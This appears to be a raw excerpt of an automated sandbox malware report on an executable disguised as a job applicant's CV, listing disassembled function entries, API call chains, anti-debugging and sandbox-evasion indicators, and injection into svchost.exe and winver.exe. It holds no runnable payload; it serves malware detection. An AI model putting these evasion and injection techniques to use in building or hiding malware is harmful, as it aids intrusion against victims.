                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039E01E LoadLibraryA,GetProcAddress,0_2_0039E01E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003AC09E push esi; ret 0_2_003AC0A0
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003AC187 push edi; ret 0_2_003AC189
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003EC8BC push esi; ret 0_2_003EC8BE
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039288B push 66003923h; retn 003Fh0_2_003928E1
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003A6B05 push ecx; ret 0_2_003A6B18
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CB2B1 push FFFFFF8Bh; iretd 0_2_003CB2B3
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003ABDAA push edi; ret 0_2_003ABDAC
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003ABEC3 push esi; ret 0_2_003ABEC5
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_019F93C2 push ss; retf 0_2_019F9409
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_019F940A push edi; retf 0_2_019F9601
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411948 push ss; retf 1_2_0041194E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040214C pushad ; retf 1_2_0040214D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416AAC push esp; retf 1_2_00416AAD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413B33 pushfd ; ret 1_2_00413B79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004033E0 push eax; ret 1_2_004033E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004144FC push edi; retf 1_2_004144FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415D23 push 00000009h; retn 3081h1_2_00415DC4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408695 push edx; retf 1_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004086AF push edx; retf 1_2_004086AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A309AD push ecx; mov dword ptr [esp], ecx1_2_03A309B6
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C5FA2D push es; ret 5_2_02C5FA40
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C53B22 push esp; retf 5_2_02C53B23
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C5306E push eax; retf 5_2_02C5306F
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C4E9BE push ss; retf 5_2_02C4E9C4
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C5C690 push eax; iretd 5_2_02C5C691
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C5C6B5 push esp; retf 5_2_02C5C6BE
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C4570B push edx; retf 5_2_02C45724
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exeCode function: 5_2_02C45725 push edx; retf 5_2_02C45724
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_04FE09AD push ecx; mov dword ptr [esp], ecx6_2_04FE09B6
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0300E310 push esi; ret 6_2_0300E317
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0301C237 push eax; iretd 6_2_0301C238
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003E8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003E8111
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0039EB42
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003A123A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeAPI/Special instruction interceptor: Address: 19FD24C
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\winver.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7096E rdtsc 1_2_03A7096E
                Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 2076Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 7896Jump to behavior
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeEvaded block: after key decisiongraph_0-94100
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeEvaded block: after key decisiongraph_0-93105
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-93552
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\winver.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\winver.exe TID: 7928Thread sleep count: 2076 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7928Thread sleep time: -4152000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7928Thread sleep count: 7896 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\winver.exe TID: 7928Thread sleep time: -15792000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe TID: 7952Thread sleep time: -65000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe TID: 7952Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe TID: 7952Thread sleep time: -54000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe TID: 7952Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe TID: 7952Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_003C6CA9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003C60DD
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003C63F9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003CEB60
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CF56F FindFirstFileW,FindClose,0_2_003CF56F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003CF5FA
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003D1B2F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003D1C8A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003D1F94
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0301C740 FindFirstFileW,FindNextFileW,FindClose,6_2_0301C740
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0039DDC0
                Source: winver.exe, 00000006.00000002.4144237864.0000000003275000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4144577938.0000000000ABF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000008.00000002.2345359398.000001DAFE66C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeAPI call chain: ExitProcess graph end nodegraph_0-92875
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7096E rdtsc 1_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417A83 LdrLoadDll,1_2_00417A83
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D6AAF BlockInput,0_2_003D6AAF
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00383D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00383D19
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_003B3920
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0039E01E LoadLibraryA,GetProcAddress,0_2_0039E01E
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_019FD518 mov eax, dword ptr fs:[00000030h]0_2_019FD518
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_019FD4B8 mov eax, dword ptr fs:[00000030h]0_2_019FD4B8
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_019FBE68 mov eax, dword ptr fs:[00000030h]0_2_019FBE68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2E388 mov eax, dword ptr fs:[00000030h]1_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5438F mov eax, dword ptr fs:[00000030h]1_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A28397 mov eax, dword ptr fs:[00000030h]1_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A403E9 mov eax, dword ptr fs:[00000030h]1_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A663FF mov eax, dword ptr fs:[00000030h]1_2_03A663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEC3CD mov eax, dword ptr fs:[00000030h]1_2_03AEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A383C0 mov eax, dword ptr fs:[00000030h]1_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB63C0 mov eax, dword ptr fs:[00000030h]1_2_03AB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE3DB mov eax, dword ptr fs:[00000030h]1_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]1_2_03ADE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD43D4 mov eax, dword ptr fs:[00000030h]1_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]1_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]1_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6A30B mov eax, dword ptr fs:[00000030h]1_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C310 mov ecx, dword ptr fs:[00000030h]1_2_03A2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A50310 mov ecx, dword ptr fs:[00000030h]1_2_03A50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD437C mov eax, dword ptr fs:[00000030h]1_2_03AD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB2349 mov eax, dword ptr fs:[00000030h]1_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov ecx, dword ptr fs:[00000030h]1_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB035C mov eax, dword ptr fs:[00000030h]1_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFA352 mov eax, dword ptr fs:[00000030h]1_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD8350 mov ecx, dword ptr fs:[00000030h]1_2_03AD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0634F mov eax, dword ptr fs:[00000030h]1_2_03B0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402A0 mov eax, dword ptr fs:[00000030h]1_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402A0 mov eax, dword ptr fs:[00000030h]1_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC62A0 mov eax, dword ptr fs:[00000030h]1_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E284 mov eax, dword ptr fs:[00000030h]1_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E284 mov eax, dword ptr fs:[00000030h]1_2_03A6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]1_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]1_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]1_2_03AB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]1_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]1_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]1_2_03A402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B062D6 mov eax, dword ptr fs:[00000030h]1_2_03B062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2823B mov eax, dword ptr fs:[00000030h]1_2_03A2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]1_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]1_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]1_2_03A34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2826B mov eax, dword ptr fs:[00000030h]1_2_03A2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB8243 mov eax, dword ptr fs:[00000030h]1_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB8243 mov ecx, dword ptr fs:[00000030h]1_2_03AB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A250 mov eax, dword ptr fs:[00000030h]1_2_03A2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36259 mov eax, dword ptr fs:[00000030h]1_2_03A36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEA250 mov eax, dword ptr fs:[00000030h]1_2_03AEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEA250 mov eax, dword ptr fs:[00000030h]1_2_03AEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A70185 mov eax, dword ptr fs:[00000030h]1_2_03A70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEC188 mov eax, dword ptr fs:[00000030h]1_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEC188 mov eax, dword ptr fs:[00000030h]1_2_03AEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD4180 mov eax, dword ptr fs:[00000030h]1_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD4180 mov eax, dword ptr fs:[00000030h]1_2_03AD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]1_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]1_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]1_2_03A2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B061E5 mov eax, dword ptr fs:[00000030h]1_2_03B061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A601F8 mov eax, dword ptr fs:[00000030h]1_2_03A601F8
